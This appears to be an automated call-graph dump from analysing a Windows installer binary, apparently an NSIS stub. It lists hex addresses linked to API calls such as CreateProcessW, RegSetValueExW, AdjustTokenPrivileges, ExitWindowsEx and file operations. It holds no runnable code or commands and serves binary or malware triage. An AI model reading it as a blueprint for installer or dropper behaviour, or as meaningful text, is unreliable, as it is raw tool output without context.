5209->5210 5211 401a57 5212 402ba2 18 API calls 5211->5212 5213 401a5d 5212->5213 5214 402ba2 18 API calls 5213->5214 5215 401a05 5214->5215 5216 4014d7 5217 402ba2 18 API calls 5216->5217 5218 4014dd Sleep 5217->5218 5220 402a4c 5218->5220 5221 40155b 5222 4029f2 5221->5222 5225 405f61 wsprintfW 5222->5225 5224 4029f7 5225->5224 5023 401ddc 5024 402ba2 18 API calls 5023->5024 5025 401de2 5024->5025 5026 402ba2 18 API calls 5025->5026 5027 401deb 5026->5027 5028 401df2 ShowWindow 5027->5028 5029 401dfd EnableWindow 5027->5029 5030 402a4c 5028->5030 5029->5030 5064 401bdf 5065 402ba2 18 API calls 5064->5065 5066 401be6 5065->5066 5067 402ba2 18 API calls 5066->5067 5068 401bf0 5067->5068 5069 401c00 5068->5069 5071 402bbf 18 API calls 5068->5071 5070 401c10 5069->5070 5072 402bbf 18 API calls 5069->5072 5073 401c1b 5070->5073 5074 401c5f 5070->5074 5071->5069 5072->5070 5075 402ba2 18 API calls 5073->5075 5076 402bbf 18 API calls 5074->5076 5077 401c20 5075->5077 5078 401c64 5076->5078 5079 402ba2 18 API calls 5077->5079 5080 402bbf 18 API calls 5078->5080 5082 401c29 5079->5082 5081 401c6d FindWindowExW 5080->5081 5085 401c8f 5081->5085 5083 401c31 SendMessageTimeoutW 5082->5083 5084 401c4f SendMessageW 5082->5084 5083->5085 5084->5085 5086 4022df 5087 402bbf 18 API calls 5086->5087 5088 4022ee 5087->5088 5089 402bbf 18 API calls 5088->5089 5090 4022f7 5089->5090 5091 402bbf 18 API calls 5090->5091 5092 402301 GetPrivateProfileStringW 5091->5092 5226 401960 5227 402ba2 18 API calls 5226->5227 5228 401967 5227->5228 5229 402ba2 18 API calls 5228->5229 5230 401971 5229->5230 5231 402bbf 18 API calls 5230->5231 5232 40197a 5231->5232 5233 40198e lstrlenW 5232->5233 5234 4019ca 5232->5234 5235 401998 5233->5235 5235->5234 5239 40601a lstrcpynW 5235->5239 5237 4019b3 5237->5234 5238 4019c0 lstrlenW 5237->5238 5238->5234 5239->5237 5240 401662 5241 402bbf 18 API calls 5240->5241 5242 401668 5241->5242 5243 40635d 2 API calls 5242->5243 5244 40166e 5243->5244 5245 4066e2 5247 406566 5245->5247 5246 406ed1 5247->5246 5248 4065f0 GlobalAlloc 5247->5248 5249 4065e7 GlobalFree 5247->5249 5250 406667 GlobalAlloc 5247->5250 5251 40665e GlobalFree 5247->5251 5248->5246 5248->5247 5249->5248 5250->5246 5250->5247 5251->5250 5252 4019e4 5253 402bbf 18 API calls 5252->5253 5254 4019eb 5253->5254 5255 402bbf 18 API calls 5254->5255 5256 4019f4 5255->5256 5257 4019fb lstrcmpiW 5256->5257 5258 401a0d lstrcmpW 5256->5258 5259 401a01 5257->5259 5258->5259 4245 4025e5 4259 402ba2 4245->4259 4247 4025f4 4248 40263a ReadFile 4247->4248 4251 40267a MultiByteToWideChar 4247->4251 4252 40272f 4247->4252 4254 4026d3 4247->4254 4255 4026a0 SetFilePointer MultiByteToWideChar 4247->4255 4256 402740 4247->4256 4258 40272d 4247->4258 4271 405c72 ReadFile 4247->4271 4248->4247 4248->4258 4251->4247 4273 405f61 wsprintfW 4252->4273 4254->4247 4254->4258 4262 405cd0 SetFilePointer 4254->4262 4255->4247 4257 402761 SetFilePointer 4256->4257 4256->4258 4257->4258 4260 40603c 18 API calls 4259->4260 4261 402bb6 4260->4261 4261->4247 4263 405cec 4262->4263 4269 405d08 4262->4269 4264 405c72 ReadFile 4263->4264 4265 405cf8 4264->4265 4266 405d11 SetFilePointer 4265->4266 4267 405d39 SetFilePointer 4265->4267 4265->4269 4266->4267 4268 405d1c 4266->4268 4267->4269 4274 405ca1 WriteFile 4268->4274 4269->4254 4272 405c90 4271->4272 4272->4247 4273->4258 4275 405cbf 4274->4275 4275->4269 4276 401e66 4277 402bbf 18 API calls 4276->4277 4278 401e6c 4277->4278 4279 405179 25 API calls 4278->4279 4280 401e76 4279->4280 4294 4056fa CreateProcessW 4280->4294 4283 401edb CloseHandle 4287 40281e 4283->4287 4284 401e8c WaitForSingleObject 4285 401e9e 4284->4285 4286 401eb0 GetExitCodeProcess 4285->4286 4297 406430 4285->4297 4289 401ec2 4286->4289 4290 401ecf 4286->4290 4301 405f61 wsprintfW 4289->4301 4290->4283 4293 401ecd 4290->4293 4293->4283 4295 401e7c 4294->4295 4296 40572d CloseHandle 4294->4296 4295->4283 4295->4284 4295->4287 4296->4295 4298 40644d PeekMessageW 4297->4298 4299 406443 DispatchMessageW 4298->4299 4300 401ea5 WaitForSingleObject 4298->4300 4299->4298 4300->4285 4301->4293 4414 401767 4415 402bbf 18 API calls 4414->4415 4416 40176e 4415->4416 4417 401796 4416->4417 4418 40178e 4416->4418 4476 40601a lstrcpynW 4417->4476 4475 40601a lstrcpynW 4418->4475 4421 401794 4425 4062ae 5 API calls 4421->4425 4422 4017a1 4477 4059ce lstrlenW CharPrevW 4422->4477 4430 4017b3 4425->4430 4427 4017ef 4483 405bca GetFileAttributesW 4427->4483 4430->4427 4431 4017c5 CompareFileTime 4430->4431 4432 401885 4430->4432 4439 40603c 18 API calls 4430->4439 4444 40601a lstrcpynW 4430->4444 4450 40185c 4430->4450 4453 405bef GetFileAttributesW CreateFileW 4430->4453 4480 40635d FindFirstFileW 4430->4480 4486 40575f 4430->4486 4431->4430 4433 405179 25 API calls 4432->4433 4435 40188f 4433->4435 4434 405179 25 API calls 4452 401871 4434->4452 4454 403027 4435->4454 4438 4018b6 SetFileTime 4440 4018c8 FindCloseChangeNotification 4438->4440 4439->4430 4441 4018d9 4440->4441 4440->4452 4442 4018f1 4441->4442 4443 4018de 4441->4443 4446 40603c 18 API calls 4442->4446 4445 40603c 18 API calls 4443->4445 4444->4430 4447 4018e6 lstrcatW 4445->4447 4448 4018f9 4446->4448 4447->4448 4451 40575f MessageBoxIndirectW 4448->4451 4450->4434 4450->4452 4451->4452 4453->4430 4456 403040 4454->4456 4455 40306b 4490 40320c 4455->4490 4456->4455 4500 403222 SetFilePointer 4456->4500 4460 403088 GetTickCount 4471 40309b 4460->4471 4461 4031ac 4462 4031b0 4461->4462 4467 4031c8 4461->4467 4464 40320c ReadFile 4462->4464 4463 4018a2 4463->4438 4463->4440 4464->4463 4465 40320c ReadFile 4465->4467 4466 40320c ReadFile 4466->4471 4467->4463 4467->4465 4468 405ca1 WriteFile 4467->4468 4468->4467 4470 403101 GetTickCount 4470->4471 4471->4463 4471->4466 4471->4470 4472 40312a MulDiv wsprintfW 4471->4472 4474 405ca1 WriteFile 4471->4474 4493 406533 4471->4493 4473 405179 25 API calls 4472->4473 4473->4471 4474->4471 4475->4421 4476->4422 4478 4017a7 lstrcatW 4477->4478 4479 4059ea lstrcatW 4477->4479 4478->4421 4479->4478 4481 406373 FindClose 4480->4481 4482 40637e 4480->4482 4481->4482 4482->4430 4484 405be9 4483->4484 4485 405bdc SetFileAttributesW 4483->4485 4484->4430 4485->4484 4487 405774 4486->4487 4488 4057c0 4487->4488 4489 405788 MessageBoxIndirectW 4487->4489 4488->4430 4489->4488 4491 405c72 ReadFile 4490->4491 4492 403076 4491->4492 4492->4460 4492->4461 4492->4463 4494 406558 4493->4494 4495 406560 4493->4495 4494->4471 4495->4494 4496 4065f0 GlobalAlloc 4495->4496 4497 4065e7 GlobalFree 4495->4497 4498 406667 GlobalAlloc 4495->4498 4499 40665e GlobalFree 4495->4499 4496->4494 4496->4495 4497->4496 4498->4494 4498->4495 4499->4498 4500->4455 5260 100018a9 5261 100018cc 5260->5261 5262 100018ff GlobalFree 5261->5262 5263 10001911 5261->5263 5262->5263 5264 10001272 2 API calls 5263->5264 5265 10001a87 GlobalFree GlobalFree 5264->5265 5266 401ee9 5267 402bbf 18 API calls 5266->5267 5268 401ef0 5267->5268 5269 40635d 2 API calls 5268->5269 5270 401ef6 5269->5270 5272 401f07 5270->5272 5273 405f61 wsprintfW 5270->5273 5273->5272 4504 40326a SetErrorMode GetVersion 4505 4032a5 4504->4505 4506 40329f 4504->4506 4592 406384 GetSystemDirectoryW 4505->4592 4507 4063f4 5 API calls 4506->4507 4507->4505 4509 4032bb lstrlenA 4509->4505 4510 4032cb 4509->4510 4595 4063f4 GetModuleHandleA 4510->4595 4513 4063f4 5 API calls 4514 4032da #17 OleInitialize SHGetFileInfoW 4513->4514 4601 40601a lstrcpynW 4514->4601 4516 403317 GetCommandLineW 4602 40601a lstrcpynW 4516->4602 4518 403329 GetModuleHandleW 4519 403341 4518->4519 4520 4059fb CharNextW 4519->4520 4521 403350 CharNextW 4520->4521 4522 40347a GetTempPathW 4521->4522 4530 403369 4521->4530 4603 403239 4522->4603 4524 403492 4525 403496 GetWindowsDirectoryW lstrcatW 4524->4525 4526 4034ec DeleteFileW 4524->4526 4527 403239 12 API calls 4525->4527 4613 402dee GetTickCount GetModuleFileNameW 4526->4613 4531 4034b2 4527->4531 4528 4059fb CharNextW 4528->4530 4530->4528 4536 403465 4530->4536 4538 403463 4530->4538 4531->4526 4533 4034b6 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4531->4533 4532 403500 4534 4035b3 4532->4534 4539 4035a3 4532->4539 4543 4059fb CharNextW 4532->4543 4537 403239 12 API calls 4533->4537 4714 403789 4534->4714 4697 40601a lstrcpynW 4536->4697 4541 4034e4 4537->4541 4538->4522 4641 403863 4539->4641 4541->4526 4541->4534 4556 40351f 4543->4556 4545 4036ed 4548 403771 ExitProcess 4545->4548 4549 4036f5 GetCurrentProcess OpenProcessToken 4545->4549 4546 4035cd 4547 40575f MessageBoxIndirectW 4546->4547 4551 4035db ExitProcess 4547->4551 4554 403741 4549->4554 4555 40370d LookupPrivilegeValueW AdjustTokenPrivileges 4549->4555 4552 4035e3 4721 4056e2 4552->4721 4553 40357d 4698 405ad6 4553->4698 4559 4063f4 5 API calls 4554->4559 4555->4554 4556->4552 4556->4553 4562 403748 4559->4562 4565 40375d ExitWindowsEx 4562->4565 4566 40376a 4562->4566 4563 403604 lstrcatW lstrcmpiW 4563->4534 4568 403620 4563->4568 4564 4035f9 lstrcatW 4564->4563 4565->4548 4565->4566 4569 40140b 2 API calls 4566->4569 4571 403625 4568->4571 4572 40362c 4568->4572 4569->4548 4570 403598 4713 40601a lstrcpynW 4570->4713 4724 405648 CreateDirectoryW 4571->4724 4729 4056c5 CreateDirectoryW 4572->4729 4576 403631 SetCurrentDirectoryW 4578 403641 4576->4578 4579 40364c 4576->4579 4732 40601a lstrcpynW 4578->4732 4733 40601a lstrcpynW 4579->4733 4582 40603c 18 API calls 4583 40368b DeleteFileW 4582->4583 4584 403698 CopyFileW 4583->4584 4589 40365a 4583->4589 4584->4589 4585 4036e1 4586 405ebb 38 API calls 4585->4586 4586->4534 4588 40603c 18 API calls 4588->4589 4589->4582 4589->4585 4589->4588 4590 4056fa 2 API calls 4589->4590 4591 4036cc CloseHandle 4589->4591 4734 405ebb MoveFileExW 4589->4734 4590->4589 4591->4589 4593 4063a6 wsprintfW LoadLibraryExW 4592->4593 4593->4509 4596 406410 4595->4596 4597 40641a GetProcAddress 4595->4597 4598 406384 3 API calls 4596->4598 4600 4032d3 4597->4600 4599 406416 4598->4599 4599->4597 4599->4600 4600->4513 4601->4516 4602->4518 4604 4062ae 5 API calls 4603->4604 4605 403245 4604->4605 4606 40324f 4605->4606 4607 4059ce 3 API calls 4605->4607 4606->4524 4608 403257 4607->4608 4609 4056c5 2 API calls 4608->4609 4610 40325d 4609->4610 4738 405c1e 4610->4738 4742 405bef GetFileAttributesW CreateFileW 4613->4742 4615 402e2e 4634 402e3e 4615->4634 4743 40601a lstrcpynW 4615->4743 4617 402e54 4744 405a1a lstrlenW 4617->4744 4621 402e65 GetFileSize 4622 402e7c 4621->4622 4638 402f61 4621->4638 4625 40320c ReadFile 4622->4625 4628 402fcd 4622->4628 4622->4634 4636 402d8a 6 API calls 4622->4636 4622->4638 4624 402f6a 4626 402f9a GlobalAlloc 4624->4626 4624->4634 4761 403222 SetFilePointer 4624->4761 4625->4622 4760 403222 SetFilePointer 4626->4760 4631 402d8a 6 API calls 4628->4631 4630 402fb5 4633 403027 36 API calls 4630->4633 4631->4634 4632 402f83 4635 40320c ReadFile 4632->4635 4637 402fc1 4633->4637 4634->4532 4639 402f8e 4635->4639 4636->4622 4637->4634 4640 402ffe SetFilePointer 4637->4640 4749 402d8a 4638->4749 4639->4626 4639->4634 4640->4634 4642 4063f4 5 API calls 4641->4642 4643 403877 4642->4643 4644 40387d GetUserDefaultUILanguage 4643->4644 4645 40388f 4643->4645 4762 405f61 wsprintfW 4644->4762 4646 405ee7 3 API calls 4645->4646 4649 4038bf 4646->4649 4648 40388d 4763 403b39 4648->4763 4650 4038de lstrcatW 4649->4650 4651 405ee7 3 API calls 4649->4651 4650->4648 4651->4650 4654 405ad6 18 API calls 4655 403910 4654->4655 4656 4039a4 4655->4656 4659 405ee7 3 API calls 4655->4659 4657 405ad6 18 API calls 4656->4657 4658 4039aa 4657->4658 4660 4039ba LoadImageW 4658->4660 4662 40603c 18 API calls 4658->4662 4661 403942 4659->4661 4663 403a60 4660->4663 4664 4039e1 RegisterClassW 4660->4664 4661->4656 4665 403963 lstrlenW 4661->4665 4669 4059fb CharNextW 4661->4669 4662->4660 4668 40140b 2 API calls 4663->4668 4666 403a17 SystemParametersInfoW CreateWindowExW 4664->4666 4667 403a6a 4664->4667 4670 403971 lstrcmpiW 4665->4670 4671 403997 4665->4671 4666->4663 4667->4534 4672 403a66 4668->4672 4673 403960 4669->4673 4670->4671 4674 403981 GetFileAttributesW 4670->4674 4675 4059ce 3 API calls 4671->4675 4672->4667 4677 403b39 19 API calls 4672->4677 4673->4665 4676 40398d 4674->4676 4678 40399d 4675->4678 4676->4671 4679 405a1a 2 API calls 4676->4679 4680 403a77 4677->4680 4779 40601a lstrcpynW 4678->4779 4679->4671 4682 403a83 ShowWindow 4680->4682 4683 403b06 4680->4683 4685 406384 3 API calls 4682->4685 4772 40524c OleInitialize 4683->4772 4687 403a9b 4685->4687 4686 403b0c 4689 403b10 4686->4689 4690 403b28 4686->4690 4688 403aa9 GetClassInfoW 4687->4688 4691 406384 3 API calls 4687->4691 4693 403ad3 DialogBoxParamW 4688->4693 4694 403abd GetClassInfoW RegisterClassW 4688->4694 4689->4667 4696 40140b 2 API calls 4689->4696 4692 40140b 2 API calls 4690->4692 4691->4688 4692->4667 4695 40140b 2 API calls 4693->4695 4694->4693 4695->4667 4696->4667 4697->4538 4781 40601a lstrcpynW 4698->4781 4700 405ae7 4782 405a79 CharNextW CharNextW 4700->4782 4703 403589 4703->4534 4712 40601a lstrcpynW 4703->4712 4704 4062ae 5 API calls 4710 405afd 4704->4710 4705 405b2e lstrlenW 4706 405b39 4705->4706 4705->4710 4708 4059ce 3 API calls 4706->4708 4707 40635d 2 API calls 4707->4710 4709 405b3e GetFileAttributesW 4708->4709 4709->4703 4710->4703 4710->4705 4710->4707 4711 405a1a 2 API calls 4710->4711 4711->4705 4712->4570 4713->4539 4715 4037a1 4714->4715 4716 403793 CloseHandle 4714->4716 4788 4037ce 4715->4788 4716->4715 4722 4063f4 5 API calls 4721->4722 4723 4035e8 lstrcatW 4722->4723 4723->4563 4723->4564 4725 40362a 4724->4725 4726 405699 GetLastError 4724->4726 4725->4576 4726->4725 4727 4056a8 SetFileSecurityW 4726->4727 4727->4725 4728 4056be GetLastError 4727->4728 4728->4725 4730 4056d5 4729->4730 4731 4056d9 GetLastError 4729->4731 4730->4576 4731->4730 4732->4579 4733->4589 4735 405ecf 4734->4735 4737 405edc 4734->4737 4841 405d49 lstrcpyW 4735->4841 4737->4589 4739 405c2b GetTickCount GetTempFileNameW 4738->4739 4740 405c61 4739->4740 4741 403268 4739->4741 4740->4739 4740->4741 4741->4524 4742->4615 4743->4617 4745 405a28 4744->4745 4746 402e5a 4745->4746 4747 405a2e CharPrevW 4745->4747 4748 40601a lstrcpynW 4746->4748 4747->4745 4747->4746 4748->4621 4750 402d93 4749->4750 4751 402dab 4749->4751 4752 402da3 4750->4752 4753 402d9c DestroyWindow 4750->4753 4754 402db3 4751->4754 4755 402dbb GetTickCount 4751->4755 4752->4624 4753->4752 4756 406430 2 API calls 4754->4756 4757 402dc9 CreateDialogParamW ShowWindow 4755->4757 4758 402dec 4755->4758 4759 402db9 4756->4759 4757->4758 4758->4624 4759->4624 4760->4630 4761->4632 4762->4648 4764 403b4d 4763->4764 4780 405f61 wsprintfW 4764->4780 4766 403bbe 4767 40603c 18 API calls 4766->4767 4768 403bca SetWindowTextW 4767->4768 4769 4038ee 4768->4769 4770 403be6 4768->4770 4769->4654 4770->4769 4771 40603c 18 API calls 4770->4771 4771->4770 4773 40412a SendMessageW 4772->4773 4775 40526f 4773->4775 4774 40412a SendMessageW 4776 4052a8 OleUninitialize 4774->4776 4777 401389 2 API calls 4775->4777 4778 405296 4775->4778 4776->4686 4777->4775 4778->4774 4779->4656 4780->4766 4781->4700 4783 405a96 4782->4783 4784 405aa8 4782->4784 4783->4784 4785 405aa3 CharNextW 4783->4785 4786 4059fb CharNextW 4784->4786 4787 405acc 4784->4787 4785->4787 4786->4784 4787->4703 4787->4704 4789 4037dc 4788->4789 4790 4037a6 4789->4790 4791 4037e1 FreeLibrary GlobalFree 4789->4791 4792 40580b 4790->4792 4791->4790 4791->4791 4793 405ad6 18 API calls 4792->4793 4794 40582b 4793->4794 4795 405833 DeleteFileW 4794->4795 4796 40584a 4794->4796 4797 4035bc OleUninitialize 4795->4797 4798 40596a 4796->4798 4831 40601a lstrcpynW 4796->4831 4797->4545 4797->4546 4798->4797 4804 40635d 2 API calls 4798->4804 4800 405870 4801 405883 4800->4801 4802 405876 lstrcatW 4800->4802 4803 405a1a 2 API calls 4801->4803 4805 405889 4802->4805 4803->4805 4807 40598f 4804->4807 4806 405899 lstrcatW 4805->4806 4808 4058a4 lstrlenW FindFirstFileW 4805->4808 4806->4808 4807->4797 4809 405993 4807->4809 4808->4798 4816 4058c6 4808->4816 4810 4059ce 3 API calls 4809->4810 4811 405999 4810->4811 4813 4057c3 5 API calls 4811->4813 4812 40594d FindNextFileW 4812->4816 4817 405963 FindClose 4812->4817 4815 4059a5 4813->4815 4818 4059a9 4815->4818 4819 4059bf 4815->4819 4816->4812 4820 40590e 4816->4820 4832 40601a lstrcpynW 4816->4832 4817->4798 4818->4797 4823 405179 25 API calls 4818->4823 4822 405179 25 API calls 4819->4822 4820->4812 4824 40580b 62 API calls 4820->4824 4826 405179 25 API calls 4820->4826 4829 405179 25 API calls 4820->4829 4830 405ebb 38 API calls 4820->4830 4833 4057c3 4820->4833 4822->4797 4825 4059b6 4823->4825 4824->4820 4827 405ebb 38 API calls 4825->4827 4826->4812 4828 4059bd 4827->4828 4828->4797 4829->4820 4830->4820 4831->4800 4832->4816 4834 405bca 2 API calls 4833->4834 4835 4057cf 4834->4835 4836 4057f0 4835->4836 4837 4057e6 DeleteFileW 4835->4837 4838 4057de RemoveDirectoryW 4835->4838 4836->4820 4839 4057ec 4837->4839 4838->4839 4839->4836 4840 4057fc SetFileAttributesW 4839->4840 4840->4836 4842 405d71 4841->4842 4843 405d97 GetShortPathNameW 4841->4843 4868 405bef GetFileAttributesW CreateFileW 4842->4868 4844 405eb6 4843->4844 4845 405dac 4843->4845 4844->4737 4845->4844 4847 405db4 wsprintfA 4845->4847 4849 40603c 18 API calls 4847->4849 4848 405d7b CloseHandle GetShortPathNameW 4848->4844 4850 405d8f 4848->4850 4851 405ddc 4849->4851 4850->4843 4850->4844 4869 405bef GetFileAttributesW CreateFileW 4851->4869 4853 405de9 4853->4844 4854 405df8 GetFileSize GlobalAlloc 4853->4854 4855 405e1a 4854->4855 4856 405eaf CloseHandle 4854->4856 4857 405c72 ReadFile 4855->4857 4856->4844 4858 405e22 4857->4858 4858->4856 4870 405b54 lstrlenA 4858->4870 4861 405e39 lstrcpyA 4864 405e5b 4861->4864 4862 405e4d 4863 405b54 4 API calls 4862->4863 4863->4864 4865 405e92 SetFilePointer 4864->4865 4866 405ca1 WriteFile 4865->4866 4867 405ea8 GlobalFree 4866->4867 4867->4856 4868->4848 4869->4853 4871 405b95 lstrlenA 4870->4871 4872 405b9d 4871->4872 4873 405b6e lstrcmpiA 4871->4873 4872->4861 4872->4862 4873->4872 4874 405b8c CharNextA 4873->4874 4874->4871 5274 4021ea 5275 402bbf 18 API calls 5274->5275 5276 4021f0 5275->5276 5277 402bbf 18 API calls 5276->5277 5278 4021f9 5277->5278 5279 402bbf 18 API calls 5278->5279 5280 402202 5279->5280 5281 40635d 2 API calls 5280->5281 5282 40220b 5281->5282 5283 40221c lstrlenW lstrlenW 5282->5283 5287 40220f 5282->5287 5285 405179 25 API calls 5283->5285 5284 405179 25 API calls 5288 402217 5284->5288 5286 40225a SHFileOperationW 5285->5286 5286->5287 5286->5288 5287->5284 5287->5288 4891 40156b 4892 401584 4891->4892 4893 40157b ShowWindow 4891->4893 4894 401592 ShowWindow 4892->4894 4895 402a4c 4892->4895 4893->4892 4894->4895 5296 4050ed 5297 405111 5296->5297 5298 4050fd 5296->5298 5301 405119 IsWindowVisible 5297->5301 5307 405130 5297->5307 5299 405103 5298->5299 5300 40515a 5298->5300 5303 40412a SendMessageW 5299->5303 5302 40515f CallWindowProcW 5300->5302 5301->5300 5304 405126 5301->5304 5305 40510d 5302->5305 5303->5305 5309 404a43 SendMessageW 5304->5309 5307->5302 5314 404ac3 5307->5314 5310 404aa2 SendMessageW 5309->5310 5311 404a66 GetMessagePos ScreenToClient SendMessageW 5309->5311 5312 404a9a 5310->5312 5311->5312 5313 404a9f 5311->5313 5312->5307 5313->5310 5323 40601a lstrcpynW 5314->5323 5316 404ad6 5324 405f61 wsprintfW 5316->5324 5318 404ae0 5319 40140b 2 API calls 5318->5319 5320 404ae9 5319->5320 5325 40601a lstrcpynW 5320->5325 5322 404af0 5322->5300 5323->5316 5324->5318 5325->5322 5326 40226e 5327 402288 5326->5327 5328 402275 5326->5328 5329 40603c 18 API calls 5328->5329 5330 402282 5329->5330 5331 40575f MessageBoxIndirectW 5330->5331 5331->5327 5332 4014f1 SetForegroundWindow 5333 402a4c 5332->5333 5334 4041f2 lstrcpynW lstrlenW 4900 401673 4901 402bbf 18 API calls 4900->4901 4902 40167a 4901->4902 4903 402bbf 18 API calls 4902->4903 4904 401683 4903->4904 4905 402bbf 18 API calls 4904->4905 4906 40168c MoveFileW 4905->4906 4907 401698 4906->4907 4908 40169f 4906->4908 4910 401423 25 API calls 4907->4910 4909 40635d 2 API calls 4908->4909 4912 4021e1 4908->4912 4911 4016ae 4909->4911 4910->4912 4911->4912 4913 405ebb 38 API calls 4911->4913 4913->4907 5335 404af5 GetDlgItem GetDlgItem 5336 404b47 7 API calls 5335->5336 5345 404d60 5335->5345 5337 404bea DeleteObject 5336->5337 5338 404bdd SendMessageW 5336->5338 5339 404bf3 5337->5339 5338->5337 5340 404c2a 5339->5340 5344 40603c 18 API calls 5339->5344 5341 4040de 19 API calls 5340->5341 5346 404c3e 5341->5346 5342 404ef0 5347 404f02 5342->5347 5348 404efa SendMessageW 5342->5348 5343 404e44 5343->5342 5352 404e9d SendMessageW 5343->5352 5375 404d53 5343->5375 5349 404c0c SendMessageW SendMessageW 5344->5349 5345->5343 5350 404a43 5 API calls 5345->5350 5365 404dd1 5345->5365 5351 4040de 19 API calls 5346->5351 5355 404f14 ImageList_Destroy 5347->5355 5356 404f1b 5347->5356 5367 404f2b 5347->5367 5348->5347 5349->5339 5350->5365 5366 404c4c 5351->5366 5358 404eb2 SendMessageW 5352->5358 5352->5375 5353 404145 8 API calls 5359 4050e6 5353->5359 5354 404e36 SendMessageW 5354->5343 5355->5356 5360 404f24 GlobalFree 5356->5360 5356->5367 5357 40509a 5363 4050ac ShowWindow GetDlgItem ShowWindow 5357->5363 5357->5375 5362 404ec5 5358->5362 5360->5367 5361 404d21 GetWindowLongW SetWindowLongW 5364 404d3a 5361->5364 5373 404ed6 SendMessageW 5362->5373 5363->5375 5368 404d40 ShowWindow 5364->5368 5369 404d58 5364->5369 5365->5343 5365->5354 5366->5361 5372 404c9c SendMessageW 5366->5372 5374 404d1b 5366->5374 5376 404cd8 SendMessageW 5366->5376 5377 404ce9 SendMessageW 5366->5377 5367->5357 5378 404ac3 4 API calls 5367->5378 5382 404f66 5367->5382 5386 404113 SendMessageW 5368->5386 5387 404113 SendMessageW 5369->5387 5372->5366 5373->5342 5374->5361 5374->5364 5375->5353 5376->5366 5377->5366 5378->5382 5379 405070 InvalidateRect 5379->5357 5380 405086 5379->5380 5388 4049fe 5380->5388 5381 404f94 SendMessageW 5384 404faa 5381->5384 5382->5381 5382->5384 5384->5379 5385 40501e SendMessageW SendMessageW 5384->5385 5385->5384 5386->5375 5387->5345 5391 404935 5388->5391 5390 404a13 5390->5357 5392 40494e 5391->5392 5393 40603c 18 API calls 5392->5393 5394 4049b2 5393->5394 5395 40603c 18 API calls 5394->5395 5396 4049bd 5395->5396 5397 40603c 18 API calls 5396->5397 5398 4049d3 lstrlenW wsprintfW SetDlgItemTextW 5397->5398 5398->5390 5399 100016b6 5400 100016e5 5399->5400 5401 10001b18 22 API calls 5400->5401 5402 100016ec 5401->5402 5403 100016f3 5402->5403 5404 100016ff 5402->5404 5405 10001272 2 API calls 5403->5405 5406 10001726 5404->5406 5407 10001709 5404->5407 5415 100016fd 5405->5415 5409 10001750 5406->5409 5410 1000172c 5406->5410 5408 1000153d 3 API calls 5407->5408 5413 1000170e 5408->5413 5412 1000153d 3 API calls 5409->5412 5411 100015b4 3 API calls 5410->5411 5414 10001731 5411->5414 5412->5415 5416 100015b4 3 API calls 5413->5416 5417 10001272 2 API calls 5414->5417 5418 10001714 5416->5418 5419 10001737 GlobalFree 5417->5419 5420 10001272 2 API calls 5418->5420 5419->5415 5421 1000174b GlobalFree 5419->5421 5422 1000171a GlobalFree 5420->5422 5421->5415 5422->5415 5423 10002238 5424 10002296 5423->5424 5425 100022cc 5423->5425 5424->5425 5426 100022a8 GlobalAlloc 5424->5426 5426->5424 5427 404579 5428 4045a5 5427->5428 5429 4045b6 5427->5429 5488 405743 GetDlgItemTextW 5428->5488 5430 4045c2 GetDlgItem 5429->5430 5463 404621 5429->5463 5433 4045d6 5430->5433 5432 4045b0 5435 4062ae 5 API calls 5432->5435 5436 4045ea SetWindowTextW 5433->5436 5440 405a79 4 API calls 5433->5440 5434 404705 5437 4048b4 5434->5437 5490 405743 GetDlgItemTextW 5434->5490 5435->5429 5441 4040de 19 API calls 5436->5441 5439 404145 8 API calls 5437->5439 5444 4048c8 5439->5444 5445 4045e0 5440->5445 5446 404606 5441->5446 5442 40603c 18 API calls 5447 404695 SHBrowseForFolderW 5442->5447 5443 404735 5448 405ad6 18 API calls 5443->5448 5445->5436 5452 4059ce 3 API calls 5445->5452 5449 4040de 19 API calls 5446->5449 5447->5434 5450 4046ad CoTaskMemFree 5447->5450 5451 40473b 5448->5451 5453 404614 5449->5453 5454 4059ce 3 API calls 5450->5454 5491 40601a lstrcpynW 5451->5491 5452->5436 5489 404113 SendMessageW 5453->5489 5456 4046ba 5454->5456 5459 4046f1 SetDlgItemTextW 5456->5459 5464 40603c 18 API calls 5456->5464 5458 40461a 5461 4063f4 5 API calls 5458->5461 5459->5434 5460 404752 5462 4063f4 5 API calls 5460->5462 5461->5463 5471 404759 5462->5471 5463->5434 5463->5437 5463->5442 5465 4046d9 lstrcmpiW 5464->5465 5465->5459 5467 4046ea lstrcatW 5465->5467 5466 40479a 5492 40601a lstrcpynW 5466->5492 5467->5459 5469 4047a1 5470 405a79 4 API calls 5469->5470 5472 4047a7 GetDiskFreeSpaceW 5470->5472 5471->5466 5475 405a1a 2 API calls 5471->5475 5477 4047f2 5471->5477 5474 4047cb MulDiv 5472->5474 5472->5477 5474->5477 5475->5471 5476 404863 5479 404886 5476->5479 5481 40140b 2 API calls 5476->5481 5477->5476 5478 4049fe 21 API calls 5477->5478 5480 404850 5478->5480 5493 404100 KiUserCallbackDispatcher 5479->5493 5482 404865 SetDlgItemTextW 5480->5482 5483 404855 5480->5483 5481->5479 5482->5476 5485 404935 21 API calls 5483->5485 5485->5476 5486 4048a2 5486->5437 5494 40450e 5486->5494 5488->5432 5489->5458 5490->5443 5491->5460 5492->5469 5493->5486 5495 404521 SendMessageW 5494->5495 5496 40451c 5494->5496 5495->5437 5496->5495 5497 401cfa GetDlgItem GetClientRect 5498 402bbf 18 API calls 5497->5498 5499 401d2c LoadImageW SendMessageW 5498->5499 5500 401d4a DeleteObject 5499->5500 5501 402a4c 5499->5501 5500->5501 4996 40237b 4997 402381 4996->4997 4998 402bbf 18 API calls 4997->4998 4999 402393 4998->4999 5000 402bbf 18 API calls 4999->5000 5001 40239d RegCreateKeyExW 5000->5001 5002 4023c7 5001->5002 5012 40281e 5001->5012 5003 402bbf 18 API calls 5002->5003 5004 4023e2 5002->5004 5005 4023d8 lstrlenW 5003->5005 5006 402ba2 18 API calls 5004->5006 5008 4023ee 5004->5008 5005->5004 5006->5008 5007 402409 RegSetValueExW 5010 40241f RegCloseKey 5007->5010 5008->5007 5009 403027 36 API calls 5008->5009 5009->5007 5010->5012 5013 4027fb 5014 402bbf 18 API calls 5013->5014 5015 402802 FindFirstFileW 5014->5015 5016 40282a 5015->5016 5020 402815 5015->5020 5017 402833 5016->5017 5021 405f61 wsprintfW 5016->5021 5022 40601a lstrcpynW 5017->5022 5021->5017 5022->5020 5502 40427b 5503 404293 5502->5503 5507 4043ad 5502->5507 5508 4040de 19 API calls 5503->5508 5504 404417 5505 4044e9 5504->5505 5506 404421 GetDlgItem 5504->5506 5513 404145 8 API calls 5505->5513 5509 4044aa 5506->5509 